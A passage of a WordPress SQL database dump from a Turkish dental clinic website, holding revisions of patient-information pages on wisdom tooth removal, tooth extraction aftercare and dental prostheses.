Dişi rahat bi şekilde değerlendirebilmek için genellikle röntgen alınır. Dişin durumuna göre büyük bir film, küçük bir film veya dijital bir film alınabilir. Diş ameliyatı genellikle diş hekimi muayenehanesinde yapılan bir işlemdir ancak çok komplike durumlarda ameliyatın çene cerrahı tarafından ameliyathane şartlarında yapılması uygun görülebilir. Ameliyatın tipi ve süresi tamamen dişin durumuna pozisyonuna bağlıdır. Genellikle işlem yarım saat ile birbuçuk saat arasında sürmektedir.</p>\n<p>Ameliyattan 8 saat öncesine kadar bişey yiyip içmemeniz tavsiye edilir. İlk yapılacak işlem bölgenin uyuşturulmasıdır. Tam olarak diş ve etraf doku hissizleştiği zaman doktorunuz çalışmaya başlayacaktır. Kullanılacak yöntem dişin gömülü yada sürmüş olmasına bağlı olarak değişir.</p>\n<p>Eğer dişiniz büyük oranda sürmüşse sadece davye vasıtasıyla alınabilir. Kökler kemiğin içinde ayrık pozisyonda ve diş kemik içinde derinde ise; dişi parçalara ayırmak veya kemik kaldırmak gerekebilir.</p>\n<p>Dişiniz gömülü ise dişe ulaşmak için dişetinde bir kesim yapılır. Dişeti ekarte edilir kemik ortaya çıkarılır. Diş kemiğin de içinde ise bir miktar kemik kaldırılır. Diş iyice ortaya çıkarılıp rahat bir çalışma alanı oluşturulduktan sonra diş bazen tek parça bazen de birkaç parçaya bölünerek çıkarılır.</p>\n<p><strong>20’lik diş çekimi sonrası için tavsiyeler</strong></p>\n<p>20’lik diş ameliyatı sonrasında bir süre gözlem altında tutulacaksınız. Kendinizi daha iyi hissettiğinizde doktorunuzun da onayıyla eve gidebilirsiniz. Genellikle ameliyatı takiben birkaç gün istirahat etmeniz uygundur. Ameliyat sonrası kontrol seansları gerekebilir. Kontrole geldiğinizde çekim boşluğunun nasıl iyileştiğine bakılır, varsa dikişler alınır, ağız sağlığınızın durumu değerlendirilir. Çekim sonrasında dikkat edilmesi gereken önemli detayların sıralamak gerekirse;</p>\n<ul>\n<li>Çekimden sonra bir miktar kanama mutlaka olacaktır endişelenmeyin. Ağız içi yaralar çok hızlı iyileşir. Bunun sebebi vücudun o bölgeye fazlaca kan pompalamasıdır. Diş çekiminden sonra kanama olmasının sebebi de budur. Kanama olmazsa pıhtı oluşmaz, pıhtı oluşmazsa çekim boşluğu kapanamaz. Ağzınızı sık sık çalkalamanız ya da kanı sürekli tükürmeniz kan pıhtısını bozacaktır bunları yapmamaya dikkat edin ve kanı mümkün olduğunca yutmaya çalışın.</li>\n<li>Diş çekildikten sonra doktorunuz kanamayı durdurmak için bölgeye steril bir tampon yerleştirir. Bu tamponu 45 – 60 dakika ısırmalısınız. Kanama hala devam ediyorsa ikinci bir tamponu aynı süre için koyabilirsiniz.</li>\n<li>Anestezi etkisini kaybedene kadar uyuşmuş dil ve dudağı ısırmamaya dikkat edin.</li>\n<li>Ameliyattan hemen sonra çekim boşluğu içinde pıhtı oluşacağını söylemiştik. Yaklaşık 2 gün sonra da yumuşak doku (diş eti) çekim boşluğunun üzerini kapatmaya başlar. Sonraki aşama kemik oluşumudur; 2-3 ay içerisinde boşluk kemikle dolacaktır.</li>\n<li>Çekimden sonra 2 saat hiçbir şey yememeli ve içmemelisiniz. 2 gün boyunca sıcak gıdalar ve içecekler tüketmemelisiniz. Yara tam olarak iyileşene kadar yumuşak gıdalar tüketmeli, bol bol su içmelisiniz. İçecekleri pipetle içmemeli, karbonhidratlı içecekler ve alkol almamalısınız.</li>\n<li>Diş çekimi sonrası görülen en yaygın problem; çekim bölgesinde birkaç gün içinde başlayan ağrılardır. Bunu engellemek için çekim sonrası uyarılar kesinlikle dikkate alınmalıdır. Çekimden sonra hafif bir ağrı normaldir anestezi etkisi geçmeden aspirin harici bir ağrı kesici kullanabilirsiniz.</li>\n<li>Çekim sonrası antibiyotik, ağrı kesici veya gargara reçete edilmişse düzenli olarak kullanmalısınız.</li>\n<li>Gargara yapmak yaranın iyileşmesini hızlandıracaktır. Herhangi bir gargara reçete edilmediyse ılık tuzlu suyla gargara yapabilirsiniz. Gargarayı, 1 bardak suya 1 tatlı kaşığı tuz ekleyerek hazırlayabilirsiniz.</li>\n<li>Sigara içmeniz yara iyileşme sürecini bozacağından 24 saat boyunca kesinlikle sigara içmemelisiniz. Tavsiye edilen 3 gün sigara içmemektir. Ayrıca ilk gün mümkün olduğunca ağır fiziksel aktivitelerden kaçınmalısınız.</li>\n<li>Dikiş atıldıysa 1 hafta sonra dikişlerinizi aldırmalısınız. Zor çekimleri takiben şişliği önlemek için ilk 24 saat bölgeye 20 dakikalık aralıklarla soğuk uygulamayı unutmayın. 24 saatten sonra ise sıcak uygulayın. Genellikle şişlik 48 saat sürer.</li>\n<li>Çekim bölgesi hariç diğer dişleri düzenli fırçalamaya devam edin. 24 saat sonra çekim bölgesini de kibarca fırçalamaya başlayın.</li>\n<li>Dilinize takılan kemik kenarlarını kök zannedebilirsiniz ama endişelenmeyin, kliniğimizde hiçbir zaman çekim sonrası kök bırakılmaz. Çekim bittikten sonra doktorunuz tüm diş köklerini size gösterecektir. Aklınıza takılan soruları sormakta tereddüt etmeyin.</li>\n</ul>\n<p>Herhangi bir rahatsızlığınızda lütfen bize danışın.[/vc_column_text][/vc_column][/vc_row]</p>\n', '20 Yaş Diş Çekimleri', '', 'inherit', 'closed', 'closed', '', '6397-autosave-v1', '', '', '2018-07-18 20:36:26', '2018-07-18 17:36:26', '', 6397, 'http://www.ze-dent.com/6397-autosave-v1/', 0, 'revision', '', 0);
INSERT INTO `zdenl_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(6518, 1, '2018-07-18 20:38:45', '2018-07-18 17:38:45', '[vc_row][vc_column][vc_column_text]<strong>20’lik dişler (20 yaş dişleri)</strong>\r\n\r\n20’lik dişler ağızda en son süren ve ağız sağlığı açısından en az öneme sahip dişlerdir. Bu dişler 3. büyük azılardır. ‘20 yaş dişi’ olarak adlandırılmalarının nedeni 17-23 yaş arasında sürmeleridir.\r\nYaş ilerledikçe beslenme alışkanlıklarının değişmesiyle çene yapısı küçülür. Bu sebeple dişler, çenede rahat bir şekilde sürecek yer bulamazlar. Bu yer darlığı ve dişlerin çıkmaya eğilimi, 20 yaş dişleri problemlerini oluşturur.\r\nÇoğu insanda ağzın dört köşesinde birer adet olmak üzere toplam dört tane 20’lik diş bulunur. Genellikle diş etine veya kemik içerisine gömülü bulunurlar ya da yer darlığı yüzünden farklı yönlerde sürerler. Bunlar bir dizi probleme yol açtığından daha fazla sıkıntıya neden olmadan hekim kararıyla çekilmeleri gerekir.\r\n\r\n20’lik dişlerin çıkarılması için en uygun zaman 17 yaş civarıdır. Çünkü bu yaşlarda diş yeni oluşmaya başlamıştır ve kemik yetişkinlerdeki gibi sert olmadığı için ameliyatı kolaydır. Dişlerin kökleri tam olarak oluşmadığı için de iyileşme daha hızlı olacaktır.\r\n20’lik dişin yol açtığı sıkıntılar çeşitli faktörlere göre değişir. Çene boyutu ve dişin süreceği yön, problemin büyüklüğünde belirleyicidir. Belki hiçbir ağrı ve şikayet olmayabilir ama diğer dişler büyük risk altındadır.\r\n\r\n<strong>20’lik dişlerin yol açtığı problemler</strong>\r\nDişlerin değişik sürme şekillerini ve yol açtıkları problemleri öğrenirseniz ; neden çekilmeleri gerektiğini daha iyi anlayacaksınız.\r\n\r\n<strong>ÇÜRÜK:</strong> Tükürük, bakteri ve yiyecek parçacıkları yeni çıkmakta olan dişin açtığı yuvada birikerek hem yirmilik dişi hem de yanındaki azı dişini tehdit eder. Bu tip çürükleri fark etmek ve tedavi etmek oldukça zordur. Ağrı ve enfeksiyona yol açan ve apseyle sonuçlanan ağır tablolar meydana gelebiliyor.\r\n\r\n<strong>DİŞETİ HASTALIĞI (perikoronit):</strong> Kısmen çıkmış bir yirmilik dişin dişetinde bakteri ve yiyecek artıklarının depolandığı bir enfeksiyon odağı oluşur. Bu durum ağız kokusu, ağrı, ödem ve trismusa (ağzın tam açılamaması hali) sebep olur. Enfeksiyon lenfler aracılığı ile yanak ve boyuna yayılabilir. Yirmilik dişin etrafındaki bu enfeksiyona yatkın zemin her seferinde kolayca enfekte olmaya adaydır. (Bakınız, Dişeti hastalıkları)\r\n\r\n<strong>BASINÇ AĞRISI:</strong> Sürme sırasında komşu dişlere de basınç uygulanıyorsa sıkışmadan dolayı da bir ağrı hissedilebilir. Bazı durumlarda bu basınç aşınmaya yol açar.\r\n\r\n<strong>ORTODONTİK SEBEPLER:</strong> Pek çok genç birey dişlerindeki çapraşıklıkları düzeltmek için ortodontik tedavi görmektedir. Yirmi yaş dişlerinin sürme basınçları diğer dişlere de yansıyacağından diğer dişlerde de bir hareketlilik olur, çapraşıklıklar artabilir.\r\n\r\n<strong>PROTEZLE İLGİLİ SEBEPLER:</strong> Protez planlaması yapılan bir ağızda yirmilik dişleri hesaba katmak gerekir. Çünkü, yirmilik diş çekildikten sonra değişen ağız yapısına göre yeni bir protez yapmak gerekecektir.\r\n\r\n<strong>KİST OLUŞUMU:</strong> Gömülü bir dişin sebep olduğu kistik vakalar gözlenmiştir. Kist kemik yıkımına, çene genişlemesine ve çevredeki dişlerin yer değiştirmesine ya da zarar görmesine sebep olur. Kemik yıkımını önlemek için diş çekilmeli ve kist temizlenmelidir. Nadiren bu kist çok geniş alanlara yayılırsa tümörlere dönüşebilir veya çene kemiğinde kendiliğinden kırılmalara yol açabilir.\r\n\r\n20 lik dişlerin çıkarılması için en uygun zaman 17 yaş civarıdır. Çünkü bu senelerde bu diş yeni oluşmaya başlamış, kemik yetişkinlerdeki gibi sert olmadığı için ameliyatı kolaydır. Dişlerin kökleri tam olarak oluşmadığı için de iyileşme daha hızlı olacaktır.\r\n\r\n<strong>20’lik dişin çekim aşamaları</strong>\r\n20 lik diş ameliyatı dişsel ve genel sağlık durumunuzun değerlendirilmesiyle başlar. Dişi rahat bi şekilde değerlendirebilmek için genellikle röntgen alınır. Dişin durumuna göre büyük bir film, küçük bir film veya dijital bir film alınabilir. Diş ameliyatı genellikle diş hekimi muayenehanesinde yapılan bir işlemdir ancak çok komplike durumlarda ameliyatın çene cerrahı tarafından ameliyathane şartlarında yapılması uygun görülebilir. Ameliyatın tipi ve süresi tamamen dişin durumuna pozisyonuna bağlıdır. Genellikle işlem yarım saat ile birbuçuk saat arasında sürmektedir.\r\n\r\nEğer dişiniz büyük oranda sürmüşse sadece davye vasıtasıyla alınabilir. Kökler kemiğin içinde ayrık pozisyonda ve diş kemik içinde derinde ise; dişi parçalara ayırmak veya kemik kaldırmak gerekebilir.\r\n\r\nDişiniz gömülü ise dişe ulaşmak için dişetinde bir kesim yapılır. Dişeti ekarte edilir kemik ortaya çıkarılır. Diş kemiğin de içinde ise bir miktar kemik kaldırılır. Diş iyice ortaya çıkarılıp rahat bir çalışma alanı oluşturulduktan sonra diş bazen tek parça bazen de birkaç parçaya bölünerek çıkarılır.\r\n\r\n<strong>20’lik diş çekimi sonrası için tavsiyeler</strong>\r\n\r\n20’lik diş ameliyatı sonrasında bir süre gözlem altında tutulacaksınız. Kendinizi daha iyi hissettiğinizde doktorunuzun da onayıyla eve gidebilirsiniz. Genellikle ameliyatı takiben birkaç gün istirahat etmeniz uygundur. Ameliyat sonrası kontrol seansları gerekebilir. Kontrole geldiğinizde çekim boşluğunun nasıl iyileştiğine bakılır, varsa dikişler alınır, ağız sağlığınızın durumu değerlendirilir. Çekim sonrasında dikkat edilmesi gereken önemli detayların sıralamak gerekirse;\r\n<ul>\r\n 	<li>Çekimden sonra bir miktar kanama mutlaka olacaktır endişelenmeyin. Ağız içi yaralar çok hızlı iyileşir. Bunun sebebi vücudun o bölgeye fazlaca kan pompalamasıdır. Diş çekiminden sonra kanama olmasının sebebi de budur. Kanama olmazsa pıhtı oluşmaz, pıhtı oluşmazsa çekim boşluğu kapanamaz. Ağzınızı sık sık çalkalamanız ya da kanı sürekli tükürmeniz kan pıhtısını bozacaktır bunları yapmamaya dikkat edin ve kanı mümkün olduğunca yutmaya çalışın.</li>\r\n 	<li>Diş çekildikten sonra doktorunuz kanamayı durdurmak için bölgeye steril bir tampon yerleştirir. Bu tamponu 25 – 30 dakika ısırmalısınız. Kanama hala devam ediyorsa ikinci bir tamponu aynı süre için koyabilirsiniz.</li>\r\n 	<li>Anestezi etkisini kaybedene kadar uyuşmuş dil ve dudağı ısırmamaya dikkat edin.</li>\r\n 	<li>Ameliyattan hemen sonra çekim boşluğu içinde pıhtı oluşacağını söylemiştik. Yaklaşık 2 gün sonra da yumuşak doku (diş eti) çekim boşluğunun üzerini kapatmaya başlar. Sonraki aşama kemik oluşumudur; 2-3 ay içerisinde boşluk kemikle dolacaktır.</li>\r\n 	<li>Çekimden sonra 2 saat hiçbir şey yememeli ve içmemelisiniz. 2 gün boyunca sıcak gıdalar ve içecekler tüketmemelisiniz. Yara tam olarak iyileşene kadar yumuşak gıdalar tüketmeli, bol bol su içmelisiniz. İçecekleri pipetle içmemeli, karbonhidratlı içecekler ve alkol almamalısınız.</li>\r\n 	<li>Diş çekimi sonrası görülen en yaygın problem; çekim bölgesinde birkaç gün içinde başlayan ağrılardır. Bunu engellemek için çekim sonrası uyarılar kesinlikle dikkate alınmalıdır. Çekimden sonra hafif bir ağrı normaldir anestezi etkisi geçmeden aspirin harici bir ağrı kesici kullanabilirsiniz.</li>\r\n 	<li>Çekim sonrası antibiyotik, ağrı kesici veya gargara reçete edilmişse düzenli olarak kullanmalısınız.</li>\r\n 	<li>Gargara yapmak yaranın iyileşmesini hızlandıracaktır. Herhangi bir gargara reçete edilmediyse ılık tuzlu suyla gargara yapabilirsiniz. Gargarayı, 1 bardak suya 1 tatlı kaşığı tuz ekleyerek hazırlayabilirsiniz.</li>\r\n 	<li>Sigara içmeniz yara iyileşme sürecini bozacağından 24 saat boyunca kesinlikle sigara içmemelisiniz. Tavsiye edilen 3 gün sigara içmemektir. Ayrıca ilk gün mümkün olduğunca ağır fiziksel aktivitelerden kaçınmalısınız.</li>\r\n 	<li>Dikiş atıldıysa 1 hafta sonra dikişlerinizi aldırmalısınız. Zor çekimleri takiben şişliği önlemek için ilk 24 saat bölgeye 5 dakikalık aralıklarla soğuk uygulamayı unutmayın. 24 saatten sonra ise sıcak uygulayın. Genellikle şişlik 48 saat sürer.</li>\r\n 	<li>Çekim bölgesi hariç diğer dişleri düzenli fırçalamaya devam edin. 24 saat sonra çekim bölgesini de kibarca fırçalamaya başlayın.</li>\r\n 	<li>Dilinize takılan kemik kenarlarını kök zannedebilirsiniz ama endişelenmeyin, kliniğimizde hiçbir zaman çekim sonrası kök bırakılmaz. Çekim bittikten sonra doktorunuz tüm diş köklerini size gösterecektir. Aklınıza takılan soruları sormakta tereddüt etmeyin.</li>\r\n</ul>\r\nHerhangi bir rahatsızlığınızda lütfen bize danışın.[/vc_column_text][/vc_column][/vc_row]', '20 Yaş Diş Çekimleri', '', 'inherit', 'closed', 'closed', '', '6397-revision-v1', '', '', '2018-07-18 20:38:45', '2018-07-18 17:38:45', '', 6397, 'http://www.ze-dent.com/6397-revision-v1/', 0, 'revision', '', 0),
(6519, 1, '2018-07-18 20:39:58', '2018-07-18 17:39:58', '<p>[vc_row][vc_column][vc_column_text]<strong>Diş Çekimi</strong></p>\n<p>Günümüzde, bilimsel/teknolojik ilerlemenin diş hekimliği bilimine katkıları sayesinde, öncelikle dişi tedavi etmek ve ağızda tutmak hedeflenmektedir. Ancak bazen hasta sağlığını koruma veya tedavi planlaması nedeniyle diş çekimine başvurulmaktadır. Bu durumları şöyle sıralayabiliriz:</p>\n<ul>\n<li>İleri derecede çürük ve madde kaybı yüzünden tedaviyle kurtarılamayan dişler,</li>\n<li>Çarpma sonucu, tedavisi mümkün olmayacak şekilde kırılan dişler,</li>\n<li>Kanal tedavisine rağmen kurtarılamayan apseli dişler,</li>\n<li>İleri derecede dişeti iltihabı nedeniyle sallanan dişler,</li>\n<li>Zamanında düşmeyen süt dişler,</li>\n<li>Aşırı konum değişikliği (dönme, devrilme vb.) nedeniyle sorun yaratan dişler,</li>\n<li>Kist ya da tümör içindeki dişler,</li>\n<li>Tam sürememiş (gömük) ve sorun yaratan dişler…</li>\n</ul>\n<p>Ayrıca ortodontik tedaviye yardımcı olmak amacıyla, yer darlığı nedeniyle sorunsuz olduğu halde bazı dişler çekilebilir.</p>\n<p><strong>Diş çekimi-kuvvet ilişkisi</strong></p>\n<p>Çekim sırasında elbette bir kuvvet uygulanır. Ancak çekim aletleri zaten hekimin uyguladığı kuvveti birkaç katına çıkaracak şekilde tasarlandığından, aşırı kuvvet olumsuz sonuçlar bile doğurabilir. Dolayısıyla diş çekimi daha ziyade, teknik bilgi ve beceri gerektiren bir girişimdir. Birçok çene cerrahının bayan olduğu unutulmamalıdır.</p>\n<p><strong>Diş çekimi korkusunu yenmenin yolları</strong></p>\n<p>Diş çekimi korkusunun hiçbir şekilde giderilemeyeceğinin anlaşıldığı özel durumlarda, genel anestezi altında çekim yapılabilir. Ancak çoğunlukla hasta ile hekim arasındaki diyalog ve yaklaşım böyle bir girişimin gerekmediğini göstermektedir. Öncelikle çekilmesi gereken dişin vücuda verdiği zararlar ve ağrı gibi olumsuzluklar göz önüne alınarak, bundan kurtulmak gerektiği hatırlanmalıdır. İyi bir uyuşma sağlandıktan sonra, çekim sırasında, sadece bir basınç hissi ve dişin yükselmesi sırasında küçük çıtırtılar duyulabilir. Ağrı ya da acı olmaması gerekir. Genellikle insanlar çevrelerindekileri korkutmayı severler ve bu basınç ile çıtırtıları abartarak anlatırlar. Bu tür yanlış telkinlerin etkisinde kalınmamalı, her türlü soru hekime yöneltilmelidir.</p>\n<p><strong>Diş Çekimi Sırasında Oluşabilecek Komplikasyon Sebepleri</strong></p>\n<ul>\n<li>Özellikle büyük azılarda yani çok köklü dişlerde, kökler çok ayrık ya da kıvrık olduğunda,</li>\n<li>Kemiğin elastikiyetini kaybettiği yaşlı kişilerde,</li>\n<li>Yine esnemeyen çok kalın çene kemiğine sahip olan kimselerde,</li>\n<li>Aşırı madde kaybı nedeniyle tutacak yeri azalmış ve kırılganlaşmış dişlerde çekim sırasında kırılma olabilir.<br />\nBu korkulacak bir durum değildir. Anestezi, yani uyuşma başarıyla sağlanmışsa, diş hekimi bu iş için üretilmiş aletlerle, kalan parçaları acısız bir şekilde çıkartır.</li>\n</ul>\n<p><strong>Diş çekiminden sonra dikkat edilmesi gerekenler</strong></p>\n<ul>\n<li>Çekim yarasının üzerine konan tampon yarım saat kadar tutulmalıdır.</li>\n<li>Bu tampon atıldıktan sonra, gerekmiyorsa tekrar tampon konmamalı, oluşan pıhtının bozulmamasına özen gösterilmelidir.</li>\n<li>Ağız suyla çalkalanmamalıdır.</li>\n<li>Çekim sonrası iki saat kadar bir şey yenmemeli, bu süre dolduktan sonra da mutlaka ılık şeyler tercih edilmeli, çok sıcak ya da soğuk yiyeceklerden uzak durulmalıdır.</li>\n<li>24 saat sigara içilmemelidir. Sigara pıhtının bozulmasına ve yara yerinin iltihaplanmasına neden olabilir. ‘Kuru soket’ denen bu durum uzun süre ağrıya sebep olur.</li>\n<li>24 saat alkol alınmamalıdır.</li>\n<li>Hiçbir şekilde çekim yerine dokunulmamalı, yara bölgesi emilip tükürülmemelidir.</li>\n<li>Yaralı bölge 24 saat kullanılmamalıdır.</li>\n<li>Ağrı olursa aspirin dışında bir ilaç tercih edilmeli, mümkünse bunun için hekime danışılmalıdır.</li>\n<li>Çekim yeri mutlaka temiz tutulmalıdır. Yara içerisine yemek artığı dolması önlenmelidir.</li>\n<li>Çekimden 24 saat sonra, yumuşak bir diş fırçasıyla bölge yavaşça fırçalanmalıdır. Bu sırada ılık tuzlu su gargarasından faydalanılabilir.</li>\n<li>Kanamanın hafif bir sızıntı halinde 6-24 saat sürmesi normal kabul edilmektedir. Ancak aşırı bir kanama varsa ya da bu süre aşılmışsa mutlaka diş hekimine başvurulması gerekmektedir.</li>\n<li>Aynı şekilde, uzun süren ağrı veya şişlik durumlarında da hekime haber verilmelidir.</li>\n<li>Sızıntı şeklinde devam eden kanamalarda, ıslatılmış bir çay poşeti, gazlı beze sarılarak yara yerine konulabilir. Bu şekilde bir süre tampon yapmak, çayın içindeki bazı maddelerin kan durdurucu özelliği nedeniyle faydalı olabilir.</li>\n</ul>\n<p><strong>Yara iyileştikten sonra yapılması gerekenler</strong></p>\n<p>Çekim boşluğunun yerine, duruma göre, köprü, protez ya da implant uygulanmalıdır. Çünkü diş eksikliği sindirim bozukluklarına yol açabileceği gibi, çekilen dişe komşu olan dişlerde konum bozuklukları (eğilme, devrilme vb.) ve buna bağlı olarak çiğneme sorunları oluşabilmektedir.</p>\n<p><strong>Gömük diş</strong></p>\n<p>Diş etrafındaki çene kemiğinin çok yoğun veya dişetinin çok kalın olduğu durumlarda, çene kavsinin dar olması nedeniyle dişin sürecek yer bulamaması halinde, süt dişlerinin erken kaybı sonucunda ya da bazı hastalıklara bağlı olarak dişetinin altında, kemik içinde kalmış dişlere ‘gömük diş’ denir. Bu dişler apseye neden oluyorsa, ağrı yapıyorsa, tümör ya da kist ile birlikteyse ve komşu dişin çürümesine yol açıyorsa, ayrıca dişin büyüklüğü ve konumu çene kırığı riski taşıyacak kadar kemiğin incelmesine neden oluyorsa çekilmesi gerekir.[/vc_column_text][/vc_column][/vc_row]</p>\n', 'Diş Çekimi', '', 'inherit', 'closed', 'closed', '', '6400-autosave-v1', '', '', '2018-07-18 20:39:58', '2018-07-18 17:39:58', '', 6400, 'http://www.ze-dent.com/6400-autosave-v1/', 0, 'revision', '', 0),
(6520, 1, '2018-07-18 20:40:02', '2018-07-18 17:40:02', '[vc_row][vc_column][vc_column_text]<strong>Diş Çekimi</strong>\r\n\r\nGünümüzde, bilimsel/teknolojik ilerlemenin diş hekimliği bilimine katkıları sayesinde, öncelikle dişi tedavi etmek ve ağızda tutmak hedeflenmektedir. Ancak bazen hasta sağlığını koruma veya tedavi planlaması nedeniyle diş çekimine başvurulmaktadır. Bu durumları şöyle sıralayabiliriz:\r\n<ul>\r\n 	<li>İleri derecede çürük ve madde kaybı yüzünden tedaviyle kurtarılamayan dişler,</li>\r\n 	<li>Çarpma sonucu, tedavisi mümkün olmayacak şekilde kırılan dişler,</li>\r\n 	<li>Kanal tedavisine rağmen kurtarılamayan apseli dişler,</li>\r\n 	<li>İleri derecede dişeti iltihabı nedeniyle sallanan dişler,</li>\r\n 	<li>Zamanında düşmeyen süt dişler,</li>\r\n 	<li>Aşırı konum değişikliği (dönme, devrilme vb.) nedeniyle sorun yaratan dişler,</li>\r\n 	<li>Kist ya da tümör içindeki dişler,</li>\r\n 	<li>Tam sürememiş (gömük) ve sorun yaratan dişler…</li>\r\n</ul>\r\nAyrıca ortodontik tedaviye yardımcı olmak amacıyla, yer darlığı nedeniyle sorunsuz olduğu halde bazı dişler çekilebilir.\r\n\r\n<strong>Diş çekimi-kuvvet ilişkisi</strong>\r\n\r\nÇekim sırasında elbette bir kuvvet uygulanır. Ancak çekim aletleri zaten hekimin uyguladığı kuvveti birkaç katına çıkaracak şekilde tasarlandığından, aşırı kuvvet olumsuz sonuçlar bile doğurabilir. Dolayısıyla diş çekimi daha ziyade, teknik bilgi ve beceri gerektiren bir girişimdir. Birçok çene cerrahının bayan olduğu unutulmamalıdır.\r\n\r\n<strong>Diş çekimi korkusunu yenmenin yolları</strong>\r\n\r\nDiş çekimi korkusunun hiçbir şekilde giderilemeyeceğinin anlaşıldığı özel durumlarda, genel anestezi altında çekim yapılabilir. Ancak çoğunlukla hasta ile hekim arasındaki diyalog ve yaklaşım böyle bir girişimin gerekmediğini göstermektedir. Öncelikle çekilmesi gereken dişin vücuda verdiği zararlar ve ağrı gibi olumsuzluklar göz önüne alınarak, bundan kurtulmak gerektiği hatırlanmalıdır. İyi bir uyuşma sağlandıktan sonra, çekim sırasında, sadece bir basınç hissi ve dişin yükselmesi sırasında küçük çıtırtılar duyulabilir. Ağrı ya da acı olmaması gerekir. Genellikle insanlar çevrelerindekileri korkutmayı severler ve bu basınç ile çıtırtıları abartarak anlatırlar. Bu tür yanlış telkinlerin etkisinde kalınmamalı, her türlü soru hekime yöneltilmelidir.\r\n\r\n<strong>Diş Çekimi Sırasında Oluşabilecek Komplikasyon Sebepleri</strong>\r\n<ul>\r\n 	<li>Özellikle büyük azılarda yani çok köklü dişlerde, kökler çok ayrık ya da kıvrık olduğunda,</li>\r\n 	<li>Kemiğin elastikiyetini kaybettiği yaşlı kişilerde,</li>\r\n 	<li>Yine esnemeyen çok kalın çene kemiğine sahip olan kimselerde,</li>\r\n 	<li>Aşırı madde kaybı nedeniyle tutacak yeri azalmış ve kırılganlaşmış dişlerde çekim sırasında kırılma olabilir.\r\nBu korkulacak bir durum değildir. Anestezi, yani uyuşma başarıyla sağlanmışsa, diş hekimi bu iş için üretilmiş aletlerle, kalan parçaları acısız bir şekilde çıkartır.</li>\r\n</ul>\r\n<strong>Diş çekiminden sonra dikkat edilmesi gerekenler</strong>\r\n<ul>\r\n 	<li>Çekim yarasının üzerine konan tampon yarım saat kadar tutulmalıdır.</li>\r\n 	<li>Bu tampon atıldıktan sonra, gerekmiyorsa tekrar tampon konmamalı, oluşan pıhtının bozulmamasına özen gösterilmelidir.</li>\r\n 	<li>Ağız suyla çalkalanmamalıdır.</li>\r\n 	<li>Çekim sonrası iki saat kadar bir şey yenmemeli, bu süre dolduktan sonra da mutlaka ılık şeyler tercih edilmeli, çok sıcak ya da soğuk yiyeceklerden uzak durulmalıdır.</li>\r\n 	<li>24 saat sigara içilmemelidir. Sigara pıhtının bozulmasına ve yara yerinin iltihaplanmasına neden olabilir. ‘Kuru soket’ denen bu durum uzun süre ağrıya sebep olur.</li>\r\n 	<li>24 saat alkol alınmamalıdır.</li>\r\n 	<li>Hiçbir şekilde çekim yerine dokunulmamalı, yara bölgesi emilip tükürülmemelidir.</li>\r\n 	<li>Yaralı bölge 24 saat kullanılmamalıdır.</li>\r\n 	<li>Ağrı olursa aspirin dışında bir ilaç tercih edilmeli, mümkünse bunun için hekime danışılmalıdır.</li>\r\n 	<li>Çekim yeri mutlaka temiz tutulmalıdır. Yara içerisine yemek artığı dolması önlenmelidir.</li>\r\n 	<li>Çekimden 24 saat sonra, yumuşak bir diş fırçasıyla bölge yavaşça fırçalanmalıdır. Bu sırada ılık tuzlu su gargarasından faydalanılabilir.</li>\r\n 	<li>Kanamanın hafif bir sızıntı halinde 6-24 saat sürmesi normal kabul edilmektedir. Ancak aşırı bir kanama varsa ya da bu süre aşılmışsa mutlaka diş hekimine başvurulması gerekmektedir.</li>\r\n 	<li>Aynı şekilde, uzun süren ağrı veya şişlik durumlarında da hekime haber verilmelidir.</li>\r\n 	<li>Sızıntı şeklinde devam eden kanamalarda, ıslatılmış bir çay poşeti, gazlı beze sarılarak yara yerine konulabilir. Bu şekilde bir süre tampon yapmak, çayın içindeki bazı maddelerin kan durdurucu özelliği nedeniyle faydalı olabilir.</li>\r\n</ul>\r\n<strong>Yara iyileştikten sonra yapılması gerekenler</strong>\r\n\r\nÇekim boşluğunun yerine, duruma göre, köprü, protez ya da implant uygulanmalıdır. Çünkü diş eksikliği sindirim bozukluklarına yol açabileceği gibi, çekilen dişe komşu olan dişlerde konum bozuklukları (eğilme, devrilme vb.) ve buna bağlı olarak çiğneme sorunları oluşabilmektedir.\r\n\r\n<strong>Gömük diş</strong>\r\n\r\nDiş etrafındaki çene kemiğinin çok yoğun veya dişetinin çok kalın olduğu durumlarda, çene kavsinin dar olması nedeniyle dişin sürecek yer bulamaması halinde, süt dişlerinin erken kaybı sonucunda ya da bazı hastalıklara bağlı olarak dişetinin altında, kemik içinde kalmış dişlere ‘gömük diş’ denir. Bu dişler apseye neden oluyorsa, ağrı yapıyorsa, tümör ya da kist ile birlikteyse ve komşu dişin çürümesine yol açıyorsa, ayrıca dişin büyüklüğü ve konumu çene kırığı riski taşıyacak kadar kemiğin incelmesine neden oluyorsa çekilmesi gerekir.[/vc_column_text][/vc_column][/vc_row]', 'Diş Çekimi', '', 'inherit', 'closed', 'closed', '', '6400-revision-v1', '', '', '2018-07-18 20:40:02', '2018-07-18 17:40:02', '', 6400, 'http://www.ze-dent.com/6400-revision-v1/', 0, 'revision', '', 0),
(6521, 1, '2018-07-18 20:41:16', '2018-07-18 17:41:16', '[vc_row][vc_column][vc_column_text]<strong>Protez</strong>\r\n\r\nDişlerin ve çevre dokuların çeşitli nedenlerle madde kaybına uğradığı ya da tamamen yok olduğu, yani kaybedildiği durumlarda, onları onarmak ya da yerine konması için kullanılan, hazırlanmış materyallere protez adı verilir.\r\n\r\n<strong>Protezlerin amacı nedir?</strong>\r\n\r\nProtez yapımıyla, hastanın kaybolan fonksiyonları tekrar kazandırılmaya çalışılırken, aynı zamanda bozulan konuşmasının da düzeltilmesi ve estetik görünümün de daha iyi olması amaçlanmaktadır. Böylelikle büyük oranda kaybedilen ağız sağlığı düzeltilirken toplum içinde eksik ya da harap olmuş dişlerle yaşamak zorunda kalan bireylerin psikolojik açıdan da desteklenmesi sağlanır.\r\n\r\nÇünkü bu şekilde yaşamlarını (bir süre de olsa) sürdürmek zorunda kalan bireyler, öncelikle gülmeyi unuturlar. Bu da fonksiyonel bozuklukların yanı sıra, insanlarda kendine güven duygusunun zedelenmesine neden olur.\r\n\r\nBu tip hastalara yapılan çeşitli protezlerle insanların yaşam kalitesinin yükseltilmesi amaçlanır\r\n\r\n<strong>Protez çeşitleri</strong>\r\n\r\nDişlerin kaybedilmesi sonucunda yapılan 